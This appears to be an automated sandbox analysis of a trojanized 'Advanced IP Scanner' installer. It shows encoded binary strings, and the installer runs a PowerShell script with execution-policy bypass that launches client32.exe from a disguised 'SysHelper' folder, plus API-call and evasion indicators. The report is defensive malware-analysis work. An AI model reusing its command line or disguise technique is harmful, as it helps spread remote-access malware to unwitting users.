sVjNKzRTI/rIeHOz6+cWV1Wza6+mYzlMuQZPj9AHtRml3QTvoy4yjbnLRToz5gwmCQcV6yIRBje+8n2hVFWsUrHmjse9k1x5dSrWtOz+ZmG7IJSb62gMzHCaOqDD9GY5pbdUJ3rZXjzA4jVsURkBFJWMFt/a7liZjm9lG9xVaJnm1arYiJrlUE1cAmeYzRE/Gkjk6B6qhQB1LHGVhckrlH/zWPZRqWS4I2E0nl2xHZBLdnSVhUOfKq3KO86pcwyk2aP8s3WYrVF5E5yRjhE0O07J7uYqi8RstcrXm4rpQjL2K2jwHgt14x35amphe8x6dDhbyKg06agqvWMhnjfHoP6aoU/ezWVoOR2XAf/Foxsqwyi+knbffQtU06elD0mBRvFz+E23mxH3p0+ZPOGOiWYVDL4KgaA7gHwCTFeJB7BdyZffNkpXMl7D0isZc+ykl1O+zu4B/QE7ud0p8YehdpImfm9h+trJCPhe0hDuGeFGyreT/k5K3SI7iJA4gWFbhjb/x0uFGVqZnjtSeiYl+ykV6+xk0YNIxTK9VgbR73ejFfmA7nuYSu4YmMrY/XQqaKvIQuvPfQpgMxlKX2gE4znKhha2E6mg2Xj8y1vtLs7VmcIxEGd+J7LZl1FGmZ84BT6Gsj7DtokabbIwqV85G+Y9PD4/FQlbDYStA8LuNmYR+4xTM5O/kHyoz3R9x2uRI3jv4097/3DXM/cjmZIExookMNZFRjHRGcz1+COG0sOtqP/i7tMALk/vHQIWVDx/bNnPSA3e3vCrM/zai2TvjS448biWPur4c/OyvUh044vUBcVMmHeVOKLk4hQ1MEeMo8RTtOSzpchdOfrkkJF8txdniC+M1/yKVAJLy83GoEQu3ei/LHwZueFbWQhVPRAgt4PX5eEx0rpIzrfH9irQPzBfMheVN4+m+TI/EzO9PZGzbgF1IYvfxUX02wNpnE1r2sVoxOsYQWseC+s8HRYHHS3VFG9NTSj48cJVja/Fu+dT2+RxUTU4T0swpwAivcSvh8k7S1C26KBiJ7J7jwwL7x4uuzmlN1hqm/bIjTlbMGTNgbGb
                                  Source: unins000.dat.1.drBinary or memory string: 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
                                  Source: unins000.dat.1.drBinary or memory string: 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
                                  Source: unins000.dat.1.drBinary or memory string: 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
                                  Source: TCCTL32.DLL.5.drBinary or memory string: >localhost:%d%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesvirtualVMWarevirt0000000000%02X%02X%02X%02X%02X%02XBluetoothpfntcctlex.cppRtlIpv6AddressToStringWntdll.dllntohlTCREMOTETCBRIDGE%s=%s
                                  Source: client32.exe, 00000008.00000003.2160238304.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000008.00000002.2160470138.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.2245314103.000000000071F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2248759340.0000000000722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeAPI call chain: ExitProcess graph end nodegraph_7-80851
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110CFCF0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,7_2_110CFCF0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11178A14 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,7_2_11178A14
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11030B10 SetUnhandledExceptionFilter,7_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_1115E4D1
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685B28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_685B28E1
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11030B10 SetUnhandledExceptionFilter,8_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_1115E4D1

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError,7_2_110F2280
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11027BE0 keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,7_2_11027BE0
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,7_2_1109D4A0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,7_2_1109DC20
                                  Source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                  Source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWnd
                                  Source: client32.exe, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Progman
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_11170208
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_1117053C
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11170499
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: GetLocaleInfoA,7_2_11167B5E
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_11170106
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_111701AD
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_11170011
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_111703D9
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11170500
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,7_2_685CDB7C
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_685CDC56
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_685C1CC1
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: GetLocaleInfoA,7_2_685CDC99
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_685C1DB6
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_685C1E5D
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_685C1EB8
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,8_2_1117053C
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: GetLocaleInfoA,8_2_11167B5E
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_11170011
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11170500
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11170499
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
